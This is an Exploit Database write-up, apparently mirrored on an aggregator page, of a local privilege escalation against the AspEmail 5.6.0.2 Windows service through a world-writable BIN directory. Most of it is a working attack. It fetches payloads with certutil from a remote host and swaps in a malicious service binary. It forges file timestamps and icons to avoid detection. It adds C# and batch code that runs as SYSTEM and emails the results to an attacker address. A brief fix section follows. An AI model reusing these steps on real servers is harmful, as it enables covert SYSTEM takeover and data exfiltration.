AspEmail v5.6.0.2 – Local Privilege Escalation

• Exploit Database
• 124 阅读

• 作者： Zer0FauLT
  日期： 2023-04-20
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51380/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373

  #################################################################################################################### # Exploit Title:AspEmail 5.6.0.2 - Local Privilege Escalation# # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # # Vendor Homepage: https://www.aspemail.com# # Software Link: https://www.aspemail.com/download.html# # Product: AspEmail# # Version: AspEmail 5.6.0.2 and all# # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU# # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # ####################################################################################################################   # ==================================================================================================================   [+] C:\PenTest>whoami /priv   PRIVILEGES INFORMATION ----------------------   Privilege NameDescription State ============================= ========================================= ======== SeIncreaseQuotaPrivilegeAdjust memory quotas for a processDisabled SeChangeNotifyPrivilege Bypass traverse checkingEnabled SeImpersonatePrivilegeImpersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working setDisabled # ==================================================================================================================   * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running:   [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe4400 Persits Software EmailAgent   or   [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". * Now we know that AspEmail service is active.   # ==================================================================================================================   * We will need these:   [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"   # ==================================================================================================================   [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"   Name: Persits Software EmailAgent ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run User: LocalSystem ModifiablePath: C:\Program Files (x86)\Persits Software\AspEmail\BIN IdentityReference : Everyone Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse Status: Unknown UserCanStart: False UserCanStop : False [+] C:\PenTest>del PrivescCheck.ps1   * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks.   # ================================================================================================================== #   [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"   Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.   * We do not have permission to access subdirectories.   # ==================================================================================================================   [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"   C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) DeepSecLab\psacln:(I)(OI)(CI)(N) DeepSecLab\psaadm:(I)(OI)(CI)(N) DeepSecLab\psaadm_users:(I)(OI)(CI)(N) BUILTIN\Administrators:(I)(F) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) NT SERVICE\TrustedInstaller:(I)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) * Unlike other directories, we have full privileges in the "BIN" directory of the service. * This is chmod 0777 - rwxrwxrwx in linux language. # ================================================================================================================== [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID   __PATH   \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" root\cimv2DeepSecLab{}5Win32_SID.SID="S-1-5-32-544"Win32_SIDWin32_SID2Administrators{1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0}BUILTINS-1-5-32-54416 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators   * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user.   # ==================================================================================================================   * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory.   [+] C:\PenTest>whoami DeepSecLab\Hacker   [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".   [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F   processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN Successfully processed 1 files; Failed processing 0 files   * Ok. All commands resulted successfully. We now have full privileges for this directory.   # ==================================================================================================================   * Now we will modify the EmailAgent file and inject a self-written malware. * We will be careful not to damage any files while doing this so that all transactions can be easily undone.   [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe   # ==================================================================================================================   [+]C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin   14.04.202316:47<DIR>. 14.04.202316:47<DIR>.. 01.03.200415:55 143.360 AspEmail.dll 25.02.200416:23 188.416 AspUpload.dll 13.04.202322:0012.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe 24.09.200309:22 139.264 EmailAgentCfg.cpl 24.09.200309:2594.208 EmailLogger.dll 24.09.200309:21 167.936 Null.EmailAgent.exe 6 File(s)745.472 bytes 2 Dir(s)165.936.717.824 bytes free # ==================================================================================================================   * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.   [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe   * And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect. * I used the Resource Tuner Console tool. >>> http://www.restuner.com/tour-resource-tuner-console.htm * This can be done easily with the Resource Tuner tool. >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html >>> http://www.restuner.com/download.htm   # ==================================================================================================================   [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291   Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin   14.04.202316:47<DIR>. 14.04.202316:47<DIR>.. 01.03.200415:55 143.360 AspEmail.dll 25.02.200416:23 188.416 AspUpload.dll 24.09.200309:2112.288 EmailAgent.exe 24.09.200309:22 139.264 EmailAgentCfg.cpl 24.09.200309:2594.208 EmailLogger.dll 24.09.200309:21 167.936 Null.EmailAgent.exe 6 File(s)745.472 bytes 2 Dir(s)165.936.717.824 bytes free [24.09.200309:21]12.288 EmailAgent.exe [24.09.200309:21] 167.936 Null.EmailAgent.exe   * And time manipulation is over. They look like they were uploaded at the same time long ago.   # ==================================================================================================================   * Now we check for my malware ownership.   [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID   __PATH   \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"   \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2DeepSecLab{}5Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"Win32_SIDWin32_SID2Hacker{1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0}DeepSecLabS-1-5-21-3674093405-176013069-2091862131-151128   [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name   Name   DeepSecLab\Hacker   EmailAgent.exe Owner: DeepSecLab\Hacker   # =================================================================================================================# ## #################################################################################################################### # #[EmailAgent.cs]## #################################################################################################################### ## # * We program this malware in such a way that when the server is reboot(when the services are restarted), # * It will be triggered and execute the codes we want,# * And then send a printout of all this to the email address we specified.# # using System; # using System.Linq;# using System.Text;# using System.Diagnostics; # using System.IO;# using System.Collections; # # Namespace CliToolSpace# { # class _Main # { # static void Main(string[] args) # { # Cli commandLine = new Cli();# commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # commandLine.Execute();# commandLine.ToFile(@"C:\Windows\Temp\");# } # } # } # # ## #################################################################################################################### # #[Mail.cs]## #################################################################################################################### ## # using System; # using System.Net.Mail;# using System.Net; # SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");# var mail = new MailMessage(); # mail.From = new MailAddress("mail@deepseclab.com"); # mail.To.Add("mail@hacker.com"); # mail.Subject = "Trigger Successful!"; # mail.IsBodyHtml = true; # string htmlBody;# htmlBody = "<strong>This server has been rebooted.</strong>"; # mail.Body = htmlBody; # Attachment attachment;# attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # mail.Attachments.Add(attachment); # SmtpServer.Port = 587;# SmtpServer.UseDefaultCredentials = false; # SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); # SmtpServer.EnableSsl = true;# SmtpServer.Timeout = int.MaxValue;# SmtpServer.Send(mail);# # ## #################################################################################################################### # #[Run.bat]## #################################################################################################################### ## # whoami > C:\Windows\Temp\Export.txt# cd C:\Program Files (x86)\Persits Software\AspEmail\Bin# del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe# cd c:\Windows\Tasks# del Run.bat & del Mail.exe # # ## #################################################################################################################### ## [+]Trigger Successful![+] # # [+] C:\PenTest>systeminfo | findstr "Boot Time"# System Boot Time:13.04.2022, 07:46:06# # ## #################################################################################################################### #[Export.txt]# # #################################################################################################################### ## # NT AUTHORITY\SYSTEM # # ## #################################################################################################################### # # # ================================================================================================================== # ...|||[FIX]|||...# # ================================================================================================================== #[+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # # =================================================================================================================#   [+] C:\Administrator>sc qc "Persits Software EmailAgent" [SC] QueryServiceConfig SUCCESS   SERVICE_Name: Persits Software EmailAgent TYPE : 10WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL: 1 NORMAL BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run LOAD_ORDER_GROUP : TAG: 0 DISPLAY_Name : Persits Software EmailAgent DEPENDENCIES : rpcss SERVICE_START_Name : LocalSystem   # ==================================================================================================================   [+] C:\Administrator>sc sdshow "Persits Software EmailAgent"   D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   # ==================================================================================================================   [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula   Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com   Persits Software EmailAgent Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS # ==================================================================================================================   [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET   [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"   Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.   DONE!   # ==================================================================================================================   [+] C:\Administrator>sc stop "Persits Software EmailAgent"   [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"   * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don&apos;t think it&apos;s necessary anymore.   # ==================================================================================================================